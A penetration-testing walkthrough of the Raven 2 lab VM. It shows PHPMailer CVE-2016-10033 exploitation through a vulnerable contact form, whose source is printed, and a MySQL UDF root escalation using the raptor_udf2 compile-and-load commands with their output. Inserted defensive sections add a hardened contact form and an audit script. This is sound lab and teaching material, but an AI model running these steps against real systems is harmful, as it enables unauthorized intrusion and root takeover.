Raven 2 VM Penetration Walkthrough

Preface

Honestly, this VM is a bit misleading; more on that later. But it really is a good box, and I learned quite a bit from it.

Key points

  • CVE-2016-10033
  • UDF privilege escalation on Linux

Detailed process

Information gathering

  1. Routine information gathering

    • Port scan

    • Directory scan

    Found the vendor and wordpress directories (during testing I found that the hosts file has to be edited so that raven.local resolves to the IP of the locally deployed VM)

  2. vendor directory

    This directory actually leaks (hints at) a lot of information

    • PATH file ===> /var/www/html/vendor/
    • Readme.md ==> indicates PHPMailer (meant nothing to me the first time I saw it)
    • VERSION ===> 5.2.16, looks like a version number
    • Security.md is the interesting one; its contents:
    # Security notices relating to PHPMailer
    
    Please disclose any vulnerabilities found responsibly - report any security problems found to the maintainers privately.
    
    PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10033) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](https://legalhackers.com).
    
    PHPMailer versions prior to 5.2.14 (released November 2015) are vulnerable to [CVE-2015-8476](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8476) an SMTP CRLF injection bug permitting arbitrary message sending.
    
    PHPMailer versions prior to 5.2.10 (released May 2015) are vulnerable to [CVE-2008-5619](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5619), a remote code execution vulnerability in the bundled html2text library. This file was removed in 5.2.10, so if you are using a version prior to that and make use of the html2text function, it's vitally important that you upgrade and remove this file.
    
    PHPMailer versions prior to 2.0.7 and 2.2.1 are vulnerable to [CVE-2012-0796](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0796), an email header injection attack.
    
    Joomla 1.6.0 uses PHPMailer in an unsafe way, allowing it to reveal local file paths, reported in [CVE-2011-3747](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3747).
    
    PHPMailer didn't sanitise the `$lang_path` parameter in `SetLanguage`. This wasn't a problem in itself, but some apps (PHPClassifieds, ATutor) also failed to sanitise user-provided parameters passed to it, permitting semi-arbitrary local file inclusion, reported in [CVE-2010-4914](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4914), [CVE-2007-2021](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2021) and [CVE-2006-5734](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5734).
    
    PHPMailer 1.7.2 and earlier contained a possible DDoS vulnerability reported in [CVE-2005-1807](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1807).
    
    PHPMailer 1.7 and earlier (June 2003) have a possible vulnerability in the `SendmailSend` method where shell commands may not be sanitised. Reported in [CVE-2007-3215](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3215).
    

    It directly lists PHPMailer's historical vulnerabilities, and we already know the PHPMailer version is 5.2.16, so CVE-2016-10033 applies

  3. wordpress directory

    This is the WordPress root directory. I won't show the detailed enumeration; it's just wpscan, check the version

    4.8.12, recently released (sigh, if only I had looked earlier). The reason I emphasize the version: combined with the earlier recon we know PHPMailer has CVE-2016-10033, and a Baidu search for wordpress+phpmailer turned up that WordPress's password-reset page could be used to get a shell via CVE-2016-10033. I then found a lot of exploits and tried for ages without success. Only later did I realize the VM's WordPress is 4.8, where the vulnerability should already be fixed. Dead end. Lesson for later: be more careful to avoid detours.

Getting a shell

  1. getshell

    The CVE vulnerability really does exist, but the page that actually yields a shell is contact.php. Intercepting the request shows that the information we fill in is POSTed to contact.php.

    In fact the directory scan turns up contact.zip in the web root. Looking at the source: it simply sends our input to the administrator's mailbox via PHPMailer.

    <?php
    // contact.php as recovered from contact.zip (opening tag added so the file is complete).
    if (isset($_REQUEST['action'])){
        $name=$_REQUEST['name'];
        $email=$_REQUEST['email'];
        $message=$_REQUEST['message'];
        if (($name=="")||($email=="")||($message=="")){
            echo "There are missing fields.";
        }else{
            require 'vendor/PHPMailerAutoload.php';
            $mail = new PHPMailer;
            $mail->Host = "localhost";
            // The visitor-supplied address is used as the sender; PHPMailer < 5.2.18
            // hands it to sendmail without sufficient validation (CVE-2016-10033).
            $mail->setFrom($email, 'Vulnerable Server');
            $mail->addAddress('admin@vulnerable.com', 'Hacker');
            $mail->Subject  = "Message from $name";
            $mail->Body     = $message;
            if(!$mail->send()) {
                echo 'Message was not sent.';
                echo 'Mailer error: ' . $mail->ErrorInfo;
            } else {
                echo 'Message has been sent.';
            }
        }
    }
    ?>
    

    Search for an exploit

    The script's target and backdoor need to be modified

    After running it, listen on the configured port and visit our backdoor file to get a shell

  2. One more thing worth mentioning is how CVE-2016-10033 works; it isn't actually complicated. PHPMailer calls the Linux sendmail command to send mail and obtains the host name from the passed-in SERVER_NAME, but the filtering is lax, so the regex can be bypassed and sendmail command-line arguments are injected, which lets a file be written and produces a webshell. For a more detailed explanation see:

    • https://blog.csdn.net/zhangpen130/article/details/103933875
    • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033
    • https://paper.seebug.org/161/
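    A hardened version of the same contact form, added here as an example and not the VM's own code. It assumes PHPMailer has been upgraded to 5.2.18 or later (the fix named in the Security.md above); the filenames and the admin address are taken from the contact.php shown earlier, and safe_email() is a helper written for this example.

```php
<?php
// Added example: hardened contact.php. Assumes vendor/ holds PHPMailer >= 5.2.18.
require 'vendor/PHPMailerAutoload.php';

// Strict check on the visitor-supplied address: syntactically valid and free of
// whitespace or quoting, so it can never carry extra options to sendmail.
function safe_email($addr)
{
    $addr = trim((string)$addr);
    if ($addr === '' || strlen($addr) > 254) {
        return false;
    }
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Quoted/escaped local parts are RFC-legal but a contact form never needs them.
    if (preg_match('/[\s"\'\\\\<>]/', $addr)) {
        return false;
    }
    return $addr;
}

if (isset($_REQUEST['action'])) {
    $name    = trim((string)($_REQUEST['name'] ?? ''));
    $email   = safe_email($_REQUEST['email'] ?? '');
    $message = (string)($_REQUEST['message'] ?? '');

    if ($name === '' || $email === false || $message === '') {
        echo 'There are missing or invalid fields.';
    } else {
        $mail = new PHPMailer;
        $mail->Host = 'localhost';
        // Fixed envelope sender: user input never reaches the sendmail -f argument.
        // The visitor's address goes into Reply-To instead.
        $mail->setFrom('noreply@vulnerable.com', 'Contact form');
        $mail->addReplyTo($email, $name);
        $mail->addAddress('admin@vulnerable.com', 'Hacker');
        // Keep CR/LF out of anything that becomes a header.
        $mail->Subject = 'Message from ' . preg_replace('/[\r\n]+/', ' ', $name);
        $mail->Body    = $message;
        if (!$mail->send()) {
            // Do not echo $mail->ErrorInfo to visitors; log it server-side instead.
            error_log('contact form: ' . $mail->ErrorInfo);
            echo 'Message was not sent.';
        } else {
            echo 'Message has been sent.';
        }
    }
}
```

    Upgrading PHPMailer is the actual fix for CVE-2016-10033; the input checks above only remove the contact form's exposure to the same class of header/argument injection.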

Privilege escalation

  1. After getting a shell, the first thing to look at is the WordPress site's information, since WordPress was not used to get the shell. In the WordPress config file we find the MySQL user and password

    Logging into MySQL didn't turn up anything useful either. Run a privilege-escalation helper script

    It shows MySQL running as root, so try UDF privilege escalation.

  2. Search for an exploit

    This one is a bit newer. The usage is actually explained in detail inside it.

     Usage:
     $ id
     uid=500(raptor) gid=500(raptor) groups=500(raptor)
     $ gcc -g -c raptor_udf2.c
     $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
     $ mysql -u root -p
     Enter password:
     [...]
     mysql> use mysql;
     mysql> create table foo(line blob);
     mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
     mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
     mysql> create function do_system returns integer soname 'raptor_udf2.so';
     mysql> select * from mysql.func;
     +-----------+-----+----------------+----------+
     | name      | ret | dl             | type     |
     +-----------+-----+----------------+----------+
     | do_system |   2 | raptor_udf2.so | function |
     +-----------+-----+----------------+----------+
     mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
     mysql> \! sh
     sh-2.05b$ cat /tmp/out
     uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
     [...]
    

    Errors may occur during execution, as they did for me; the fix:

  3. Now we can run commands as root, and can use some SUID privilege escalation, e.g. find, vi

    vi escalation 1

    vi escalation 2

    find escalation 1

    find escalation 2

  4. Finally

  5. A brief summary

    Being careful saves a lot of detours. Sometimes rushing to the goal wastes more time; better to enjoy the process. As the saying goes, fast is slow, slow is fast

References
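    A small audit script for the preconditions the UDF technique above relies on (a writable plugin directory, unrestricted LOAD_FILE/INTO DUMPFILE, mysqld running as root, and rows in mysql.func), added here as an example and not part of the write-up or the raptor exploit. The DSN, the audit account and its password are assumptions; run it on the database host with an account that can read mysql.func.

```php
<?php
// Added example: audit the MySQL-side conditions behind UDF privilege escalation.
function audit_mysql_udf(PDO $db)
{
    $findings = [];

    // 1. Every row in mysql.func is a registered UDF. A plain WordPress box has none,
    //    so the do_system entry created by the technique above shows up here.
    foreach ($db->query('SELECT name, dl FROM mysql.func') as $row) {
        $findings[] = sprintf('UDF registered: %s from %s', $row['name'], $row['dl']);
    }

    // 2. secure_file_priv: empty means LOAD_FILE / SELECT ... INTO DUMPFILE may touch
    //    any path the server process can reach (how the .so lands in plugin_dir);
    //    NULL disables both, a directory restricts them to that directory.
    $v = $db->query('SELECT @@secure_file_priv AS p, @@plugin_dir AS d')->fetch(PDO::FETCH_ASSOC);
    if ($v['p'] === '') {
        $findings[] = 'secure_file_priv is empty: file import/export is unrestricted';
    }

    // 3. plugin_dir writable by the user this script runs as. It only reflects this
    //    process's rights, so run it as the mysqld OS user for a meaningful answer.
    if (is_writable($v['d'])) {
        $findings[] = 'plugin_dir ' . $v['d'] . ' is writable by ' . get_current_user();
    }
    return $findings;
}

// 4. mysqld running as root turns any UDF into root code execution. Uses procps ps.
function mysqld_owner()
{
    $out = shell_exec('ps -o user= -C mysqld 2>/dev/null');
    return $out === null ? null : trim($out);
}

$db = new PDO('mysql:host=127.0.0.1;dbname=mysql', 'audit', 'CHANGE_ME'); // assumed account
foreach (audit_mysql_udf($db) as $f) {
    echo "[!] $f\n";
}
$owner = mysqld_owner();
if ($owner === 'root') {
    echo "[!] mysqld runs as root\n";
} elseif ($owner !== null && $owner !== '') {
    echo "[+] mysqld runs as $owner\n";
}
```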

https://www.cnblogs.com/micr067/p/11405274.html

https://blog.csdn.net/zhangpen130/article/details/103933875

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033

https://paper.seebug.org/161/
